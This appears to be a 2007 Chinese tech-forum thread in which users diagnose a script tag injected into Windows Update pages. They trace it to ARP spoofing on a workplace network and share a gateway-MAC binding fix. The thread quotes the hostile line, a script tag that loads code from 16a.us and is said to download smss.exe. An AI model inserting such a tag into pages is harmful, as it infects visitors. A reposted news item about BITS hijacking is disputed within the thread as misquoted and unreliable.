WINDOWS UPDATE网站被植入木马？？？？

yuanhen

我是正版的xp，今天无法上UPDATE更新。

在出错页面源代码的最顶端有一行代码：

<script src=http://16a.us/2.js></script>   
如下图：

这段JS程序会从http://16a.us/oKK/smss.exe 下载病毒体，瑞星最新版本的病毒库（19.23.32）可以查到此病毒packer.mian007。


是不是微软UPDATE被搞定了？

patten

晕...

wao1201

*.*lll 不是吧  在盖大叔家门口挂马？？？！！！

marione

跟那个可恶的4255.biz很类似，是不是局域网有什么机器中毒了

cxcx

出错页面？楼主确认是微软的页面吗？
刚刚试了一下，可以更新，所以无法证实

某些本机的程序可以修改HTML代码然后再发送给浏览器解析
或者上了钓鱼网站……

yuanhen

QUOTE:

原帖由 marione 于 2007-5-17 17:58 发表
跟那个可恶的4255.biz很类似，是不是局域网有什么机器中毒了

我靠，家里的可以。单位试了几台机子都不行。局域网某台机子中毒，怎么会影响到其他机子上网？什么原理？

yuanhen

QUOTE:

原帖由 cxcx 于 2007-5-17 18:05 发表
出错页面？楼主确认是微软的页面吗？
刚刚试了一下，可以更新，所以无法证实

某些本机的程序可以修改HTML代码然后再发送给浏览器解析
或者上了钓鱼网站……

本机中毒的可能性微乎其微，不是我一台机器出现这种情况。

ibmmm

是你自己中招了

sokoo

俄罗斯黑客成功劫持Windows Update的下载器

Background Intelligent Transfer Service -- 微软Windows Update等服务的重要后台程序,最近被黑客攻破,根据Symantec研究人员的消息,他们发现已经有黑客劫持了BITS,可以自由控制用户下载更新的内容,而BITS是完全被操作系统安全机制信任的服务,连防火墙都没有任何警觉.这意味着利用BITS,黑客可以很轻松地把恶意内容以合法的手段下载到用户的电脑并执行.



Symantec的研究人员同时也表示,目前他们发现的特洛伊正在尝试劫持,但并没有将恶意代码写入,也没有准备好提供给用户的"货",但提醒用户要提高警觉.

转自cnBeta.com

http://www.cnbeta.com/articles/26365.htm


以上，很可能已经被利用了

cxcx

QUOTE:

原帖由 yuanhen 于 2007-5-17 18:13 发表


本机中毒的可能性微乎其微，不是我一台机器出现这种情况。

根据9楼的说法，这种微乎其微的可能性很可能降落到了不止楼主一台机上

yuanhen

QUOTE:

原帖由 cxcx 于 2007-5-17 18:52 发表

根据9楼的说法，这种微乎其微的可能性很可能降落到了不止楼主一台机上

QUOTE:

原帖由 marione 于 2007-5-17 17:58 发表
跟那个可恶的4255.biz很类似，是不是局域网有什么机器中毒了

这个可能性很大。

nine

看看你的host文件有没有被修改了。

yogibear

QUOTE:

原帖由 sokoo 于 2007-5-17 18:22 发表
俄罗斯黑客成功劫持Windows Update的下载器

Background Intelligent Transfer Service -- 微软Windows Update等服务的重要后台程序,最近被黑客攻破,根据Symantec研究人员的消息,他们发现已经有黑客劫持了BI ...

那人写文章太不负责了,人家原话是
"Symantec first caught chatter about BITS on Russian hacker messageboards late last year, Friedrichs added, and has been on the lookoutfor it since. A Trojan spammed in March was one of the first to put thetechnique into practice."
并不是说就是俄罗斯黑客干的.

TAMK

关注... *.*lll

zhaoxuliang

<html dir='ltr'>
<head>
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North America Server" by "inet@microsoft.com" on "1997.06.30T14:48-0500" r (n 0 s 0 v 0 l 0))' />
<meta http-equiv='Content-Type' content='text/html;charset=gb2312' />
<meta http-equiv='MSThemeCompatible' content='yes' />
<title>Microsoft Update</title>
<link rel='shortcut icon' href='shared/images/bannersmu/favicon.ico' type='image/x-icon'/>
<meta name='MSSmartTagsPreventParsing' content='yes' />

麦糊CEO

16a.us病毒（又一次ARP病毒欺骗攻击）解决方案，具体步骤请查看：
http://www.maihu.net/tech/view_227.html
基本原理是将网关的MAC地址进行静态绑定，我已经按照这个办法解决了我们单位局域网所有电脑上的这个问题。

麦糊CEO

最近很多朋友都遇到16a.us病毒困挠，我的上一篇文章 《16a.us病毒（又一次ARP病毒欺骗攻击）解决方案http://www.maihu.net/tech/view_227.html》，只是简单绕过问题或者说是没有治本，昨天在我的网站转载了一篇新文章《处理“元凶”，彻底根除16a.us病毒http://www.maihu.net/tech/view_233.html》（是我的一个好朋友写的），希望对还处在16a.us病毒困挠的朋友们能够有所帮助！
============
麦糊网(maihu.net)-网站运营聚合门户

梨子精

  ARP